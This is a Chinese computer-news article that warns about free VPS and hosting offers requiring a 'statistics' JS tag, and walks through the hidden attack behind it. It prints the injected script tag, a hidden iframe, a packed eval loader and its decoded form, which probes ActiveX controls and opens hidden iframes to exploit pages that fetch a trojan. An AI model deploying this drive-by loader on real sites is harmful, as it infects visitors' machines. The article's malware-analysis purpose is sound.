免费背后的陷阱被动传播木马 - 新闻中心 - 资讯频道 - 德州电脑服务网-德州电脑组装资讯-德州服务器资讯-德州电脑报价资讯-德州二手电脑资讯-德州二手笔记本资讯

TOP

免费背后的陷阱被动传播木马

[ 编辑:qiraosky | 时间:2012-03-20 21:51:58 | 浏览:347次 | 来源:德州电脑服务网 | 作者:德州电脑服务网 ]

前几日看到有人提供免费VPS和空间，感觉蛮好奇。猜测对方意图未果，便加上QQ询问，结果几句话下来吓我一跳。此人免费提供空间或vps，只要求挂一段JS代码，无任何广告不影响网站说目的是为了刷流量和排名！话说到此就感觉对方在胡扯，于是下载对方要求的JS一看，里面只连接了一个JS URL，在下在看又是一个，每次都要转成HTML看，好几个下来把老汉累个半死！最后终于出来一堆东西，最终目标自动下载木马！

利用一大堆漏洞，具体代码不贴了，瑞星免杀的，中了麻烦！

DPClient.Vod迅雷漏洞；MPS.StormPlayer.1暴风影音漏洞；
PowerPlayerCtrl.1DVD播放器漏洞；Pdg2 超星阅览器漏洞；
GLCHAT.GLChatCtrl.1联众大厅漏洞；
BaiduBar.Tool.1百度超级搜霸漏洞，......

首先检查你是否安装WEB迅雷，无安装的会弹出安装提示，安装的会利用xunlei漏洞自动下载并执行木马！

要求挂的代码是:
< sc ri pt src="http://www.xxxxxx/count1.js"></ scr ip t>
看起来像统计,是吧.
然后我下回来分析下:
documen t.writ eln("<ifr ame src="http://xxxxxx/page/add_ 65543967.htm?0055" width=0 height=0>< /ifram e>")
看到了吧,是打开了的一个静态页面
我们来继续分析:
http://xxxxxx/page/add_ 65543967.htm
其实是
http://xxxxxxpageadd_ 65543967.htm(这是地址)?0055(类似于统计)
来分析下上面的页面代码:
< scr ipt src=addr.js(嫌疑地址)></script>
<script language="javascript" type="text/javascript" src="http://js.xxxxxx.la/xxxxxx.js(统计地址)"></s crip t>
跳过统计,我们来看那个嫌疑地址addr.js:
eva l (funct ion(p,a,c,k,e,d){e=function©{return(c<a?:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c--)d[e©]=k[c]||e©;k=[function(e){return d[e]}];e=function(){returnw+};c=1};while(c--)if(k[c])p=p.replace(new RegExp(+e©+,g),k[c]);return p}(z n=h 1f();n.1e(n.1d()+1c*A*A*1b);z y=h 1a(3.v);4(y.x("u=")==-1){j{4(19.18.17().x("w"+"16 7")==-1)3.f(<2 c=l:b a="9://8.5/w.k"></2>)}i(e){}3.v="u=15;13="+n.12();j{4(h m("11.10"))3.f(<2 c=l:b a="9://8.5/Z.k"></2>)}i(e){}j{4(h m("Y.X"+"W"+"V.1"))3.f(<2 c=l:b a="9://8.5/U.k"></2>)}i(e){}j{4(h m("T.S.1"))3.f(<2 c=l:b a="9://8.5/R.k"></2>)}i(e){}Q="P##########################!@#@!#O";j{q=h m("t"+"s"+".t"+"s.1");4(q.N("M")<="6.0.14.L"){K="J*(&F)(D*&F()*D&F)";3.f(<2 c=d+p+o:b a="9://8.5/r+I.g+4"></2>)}H{3.f(<2 c=d+p+o:b a="9://8.5/r+G.g+4"></2>)}}i(e){}j{4(h m("E.C.1"))3.f(<2 c=l:b a="9://8.5/B.k"></2>)}i(e){}},62,78,||iframe|document|if|cn|||51xiazai886|http|src|none|style|||write||new|catch|try|gif|display|ActiveXObject|Then|lay|isp|Link||PCtl|IER|Cookie1|cookie|ms|indexOf|bbbbcookie|var|60|lz|GLChatCtrl||GLCHAT||eal_new|else|eal|yyyyyyyyyyy|xxxxxxxxxxxxxfiudsif|552|PRODUCTVERSION|PlayerProperty|lasf|flsadjfljasfd|fakshdflkasdhfasdf|bd|Tool|BaiduBar|bf|layer|ormP|St|MPS|xl|Vod|DPClient|toGMTString|expires||POPWIN DOS|ie|toLowerCase|userAgent|navigator|String|1000|24|getTime|setTime|Date.split(|),0, {}))
哦,加密了呢~那就解:
var The n=ne w Da te();Then.setTime(Then.getTime()+24*60*60*1000);var bbbbcookie=new String(document.cookie);if(bbbbcookie.indexOf("Cookie1=")==-1){try{if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1)document.write(<iframe style=display:none src="http://xxxx/ms.gif"></iframe>)}catch(e){}document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();try{if(new ActiveXObject("DPClient.Vod"))document.write(<iframe style=display:none src="http://xxxxx/xl.gif"></iframe>)}catch(e){}try{if(new ActiveXObject("MPS.St"+"ormP"+"layer.1"))document.write(<iframe style=display:none src="http://xxxxxxbf.gif"></iframe>)}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write(<iframe style=display:none src="http://xxxxxxx/bd.gif"></iframe>)}catch(e){}fakshdflkasdhfasdf="flsadjfljasfd##########################!@#@!#lasf";try{Link=new ActiveXObject("IER"+"PCtl"+".IER"+"PCtl.1");if(Link.PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){xxxxxxxxxxxxxfiudsif="yyyyyyyyyyy*(&F)(D*&F()*D&F)";document.write(<iframe style=d+isp+lay:none src="http://xxxxxx.cn/r+eal_new.g+if"></iframe>)}}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write(<iframe style=display:none src="http://xxxxxxx/lz.gif"></iframe>)}catch(e) { }}
好多网马~还都是GIF格式的.在这里讲下小知识,GIF格式是可以执行HTML命令的,大家可以试下.
随便解密下XL.GIF(一看就像是讯雷的,不过不要通过看,要进行真实分析)
因代码过长,所以我只写出解密的木马地址吧:
http://xxxxxx/s.exe
这里的知识点: 怎么进行网马的分辨:
clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F 这个的就是讯雷的
最后我们来分析这个木马
杀毒网报出的信息:

扫描结果 : 22%的杀软(8/36)报告发现病毒时间 : 2008/05/19 18:06:08 (CST)

AntiVir7.8.0.197.0.4.592008-05-19TR/Agent.4096.209
15.241Arcavir1.0.42008051901482008-05-19Heur.Win32.I
6.526BitDefender7.60825.12008237.190672008-05-19Trojan.Agent.AINZ
Dr.WEB4.44.0.91702008.05.192008-05-19Trojan.MulDrop.15725
F-PROT4.4.1.52200805182008-05-18Possible W32/Downloader-Sml-based!Maximus
SOPHOS2.73.04.292008-05-19Mal/Heuri-E
VBA323.12.6.620080518.15382008-05-18Win32.Trojan.Downloader (http://...) (suspicious)
趋势8.500-10015.284.032008-05-18TROJ_ZLOB.AKT

此人QQ 316070087 网站他资料有对代码有兴趣者可以复制他的网址代替< sc ri pt src="http://www.xxxxxx/count1.js"></ scr ip t> 中的xxxxxx研究！

最后几句，无商不奸天下无免费的午餐埋头苦干胜于光说不练

【大中小】【打印】【繁体】【投稿】【关闭】【评论】【返回顶部】

[上一篇]做网站创业永远胜过职场上班者

[下一篇]我们能从SNS网站得到些什么